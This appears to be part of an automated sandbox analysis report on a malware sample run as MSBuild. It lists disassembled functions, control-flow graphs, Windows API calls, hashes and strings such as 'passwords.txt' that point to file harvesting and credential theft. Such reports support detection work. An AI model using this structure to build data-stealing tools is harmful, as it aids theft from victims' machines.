                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                                            • String ID: `$passwords.txt
                                                                                                                                                                                                                                                                            • API String ID: 998505060-1172772161
                                                                                                                                                                                                                                                                            • Opcode ID: 394aa70c948baad0faa4885fba661abafd2c9501512b629c4db32deb0cf4da0c
                                                                                                                                                                                                                                                                            • Instruction ID: 63851fc3274498d7ace03ef38f0d11ae2fd2b8d34633411e4d20ec60dba1fe74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 394aa70c948baad0faa4885fba661abafd2c9501512b629c4db32deb0cf4da0c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3C18F74D00218EBCB14EBE4DC45AEEBB79BF19304F10452DF612B3291DB786A09CB65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00416548 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 215stringfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1899 416548-41654f 1900 416550-416564 StrCmpCA 1899->1900 1901 416867-41687a FindNextFileA 1900->1901 1902 41656a-41657e StrCmpCA 1900->1902 1901->1900 1903 416880-416899 FindClose call 40fea0 1901->1903 1902->1901 1904 416584-4165b5 wsprintfA StrCmpCA 1902->1904 1910 41689d-4168c4 call 40fea0 * 2 1903->1910 1906 4165e0-4165fd wsprintfA 1904->1906 1907 4165b7-4165de wsprintfA 1904->1907 1909 416600-416640 memset lstrcat strtok_s 1906->1909 1907->1909 1911 416642-416653 1909->1911 1912 41666f-4166ac memset lstrcat strtok_s 1909->1912 1913 416801-416809 1911->1913 1922 416659-41666d strtok_s 1911->1922 1912->1913 1914 4166b2-4166c2 PathMatchSpecA 1912->1914 1913->1901 1916 41680b-416819 1913->1916 1918 416754-416768 strtok_s 1914->1918 1919 4166c8-416752 call 411450 wsprintfA call 40fea0 DeleteFileA CopyFileA call 4118d0 call 419670 1914->1919 1916->1903 1921 41681b-416823 1916->1921 1918->1914 1925 41676e 1918->1925 1919->1918 1939 416773-41677e 1919->1939 1921->1901 1926 416825-416861 call 401120 call 4164a0 1921->1926 1922->1911 1922->1912 1925->1913 1926->1901 1940 4168c5-4168d8 call 40fea0 1939->1940 1941 416784-4167aa call 40fe20 call 406e80 1939->1941 1940->1910 1948 4167f4-4167fb DeleteFileA 1941->1948 1949 4167ac-4167ef call 40fe20 call 401120 call 4153e0 call 40fea0 1941->1949 1948->1913 1949->1948
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427618,?,?,?,?,?,?,?,00416AC2,?), ref: 0041655C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042761C,?,?,?,?,?,?,?,00416AC2,?), ref: 00416576
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041659B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427343,?,?,?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 004165AD
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004165D5
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004165F7
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041660D
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416620
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416636
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416663
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041667C
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 0041668C
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 004166A2
                                                                                                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004166BA
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004166FD
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00416718
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0041672E
                                                                                                                                                                                                                                                                              • Part of subcall function 004118D0: CreateFileA.KERNEL32(@gA,80000000,00000003,00000000,00000003,00000080,00000000,?,00416740,?), ref: 004118ED
                                                                                                                                                                                                                                                                              • Part of subcall function 004118D0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                                              • Part of subcall function 004118D0: CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041674B
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0041675E
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004167FB
                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416872
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416884
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$strtok_swsprintf$CloseDeleteFindlstrcatmemset$CopyCreateHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                                                                                            • API String ID: 3540076140-2927280355
                                                                                                                                                                                                                                                                            • Opcode ID: 723228165f9c214288ddb40b34de1f30534ec9953c5203047287f0891c5065a3
                                                                                                                                                                                                                                                                            • Instruction ID: c7960d27603167e2095e1da8c747364c01f2345784f24c67a0cfb0406d393024
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723228165f9c214288ddb40b34de1f30534ec9953c5203047287f0891c5065a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2871BAB5900219ABDB24DF94DC85EEE737DEB48704F10855EF50993241EB38EE88CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00414330 Relevance: 39.7, APIs: 11, Strings: 11, Instructions: 1203sleepCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1957 414330-414415 call 40fe10 * 3 call 40feb0 * 3 call 40fe20 * 6 1982 414418-41441f call 402760 1957->1982 1985 414425-414541 call 402480 call 40ff00 call 40fea0 call 4024e0 call 40fe60 * 5 call 413a40 call 40ff00 1982->1985 1986 414546-414640 call 402480 call 4024b0 call 40fe60 * 3 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 1982->1986 2036 4146b7-4146ba call 40fea0 1985->2036 2023 414642-414699 call 4024e0 call 40fe60 * 2 call 401120 call 413a40 1986->2023 2024 4146bf-4146d5 call 4100c0 StrCmpCA 1986->2024 2066 41469e-4146b1 call 40ff00 2023->2066 2032 4152a6-4153ac call 40ff00 call 4024e0 call 40ff00 call 40fea0 call 402770 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2024->2032 2033 4146db-4146e2 call 402750 2024->2033 2407 4153b0-4153d6 call 40fea0 * 2 2032->2407 2045 414892-4148a8 call 4100c0 StrCmpCA 2033->2045 2046 4146e8-4146ef call 402760 2033->2046 2036->2024 2060 415197-4152a1 call 40ff00 call 402570 call 40ff00 call 40fea0 call 4027a0 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2045->2060 2061 4148ae-4148b5 call 402760 2045->2061 2057 4146f5-414791 call 402510 call 40ff00 call 40fea0 call 402570 call 40fe60 call 402510 call 401120 call 413a40 call 40ff00 2046->2057 2058 414796-414813 call 402510 call 402540 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2046->2058 2239 41488a-41488d call 40fea0 2057->2239 2058->2045 2187 414815-414884 call 402570 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2058->2187 2060->2407 2075 414a7b-414a94 call 4100c0 StrCmpCA 2061->2075 2076 4148bb-4148c2 call 402760 2061->2076 2066->2036 2097 415085-415192 call 40ff00 call 402600 call 40ff00 call 40fea0 call 4027d0 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2075->2097 2098 414a9a-414aa1 call 402760 2075->2098 2095 4148c8-41496a call 4025a0 call 40ff00 call 40fea0 call 402600 call 40fe60 call 4025a0 call 401120 call 413a40 call 40ff00 2076->2095 2096 41496f-4149f2 call 4025a0 call 4025d0 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2076->2096 2311 414a73-414a76 call 40fea0 2095->2311 2096->2075 2254 4149f8-414a6d call 402600 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2096->2254 2097->2407 2124 414c51-414c67 call 4100c0 StrCmpCA 2098->2124 2125 414aa7-414aae call 402760 2098->2125 2144 414f70-415080 call 40ff00 call 402690 call 40ff00 call 40fea0 call 402800 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2124->2144 2145 414c6d-414c74 call 402760 2124->2145 2153 414b55-414bd2 call 402630 call 402660 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2125->2153 2154 414ab4-414b50 call 402630 call 40ff00 call 40fea0 call 402690 call 40fe60 call 402630 call 401120 call 413a40 call 40ff00 2125->2154 2144->2407 2180 414e30-414e46 call 4100c0 StrCmpCA 2145->2180 2181 414c7a-414c81 call 402760 2145->2181 2153->2124 2325 414bd4-414c43 call 402690 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2153->2325 2371 414c49-414c4c call 40fea0 2154->2371 2223 414e58-414f6b call 40ff00 call 402720 call 40ff00 call 40fea0 call 402830 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2180->2223 2224 414e48-414e53 Sleep 2180->2224 2218 414c87-414d29 call 4026c0 call 40ff00 call 40fea0 call 402720 call 40fe60 call 4026c0 call 401120 call 413a40 call 40ff00 2181->2218 2219 414d2e-414db1 call 4026c0 call 4026f0 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2181->2219 2187->2239 2421 414e28-414e2b call 40fea0 2218->2421 2219->2180 2392 414db3-414e25 call 402720 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2219->2392 2223->2407 2224->1982 2239->2045 2254->2311 2311->2075 2325->2371 2371->2124 2392->2421 2421->2180
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414638
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00413A40: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004146CD
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041480B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148A0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004149EA
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414A8C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414BCA
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414C5F
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DA9
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00414E4D
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                                            • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                            • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                                                            • Opcode ID: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                            • Instruction ID: 6a2bbd2f173dbc1054a30c93a0a01a9f01b5700f65783502aefbb1eff031eee4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB28470C01248EACB14EBB5C9566DDBBB86F15308F5480BEE945736C2DB78670CCBA6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00407440 Relevance: 33.6, APIs: 22, Instructions: 569stringfilememoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,00E398A0,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040751F
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040755D
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004077D6
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407925
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A98), ref: 00407934
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407947
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A9C), ref: 00407956
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407969
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AA0), ref: 00407978
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040798B
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AA4), ref: 0040799A
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004079AD
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AA8), ref: 004079BC
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 004079CF
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AAC), ref: 004079DE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A25
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426AB0), ref: 00407A43
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(000000FF), ref: 00407AAA
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(000000FF), ref: 00407AB9
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004077DD
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: memset.MSVCRT ref: 00411A55
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: wsprintfW.USER32 ref: 00411A9C
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
                                                                                                                                                                                                                                                                              • Part of subcall function 00411A20: CloseHandle.KERNEL32(00000000), ref: 00411B13
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00407B10
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,00426A62), ref: 00407B38
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$File$Copymemset$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2919035586-0
                                                                                                                                                                                                                                                                            • Opcode ID: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
                                                                                                                                                                                                                                                                            • Instruction ID: ac20bff3860d788065b8a73e72d727c9ff0ab2c095c62357def0f70ed4808e92
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63325F71900248EACB14EBE4DD55BEEBB79AF19308F10417EF50273292DB786A08CB65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00409730 Relevance: 31.9, APIs: 21, Instructions: 433stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004097F6
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409962
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00409969
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AAF
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C78), ref: 00409ABE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AD1
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C7C), ref: 00409AE0
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AF3
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C80), ref: 00409B02
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B15
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C84), ref: 00409B24
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B37
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C88), ref: 00409B46
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B59
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C8C), ref: 00409B68
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B7B
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426C90), ref: 00409B8A
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(000000FF), ref: 00409C00
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(000000FF), ref: 00409C0F
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00409C65
                                                                                                                                                                                                                                                                              • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,00E398A0,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00409C8D
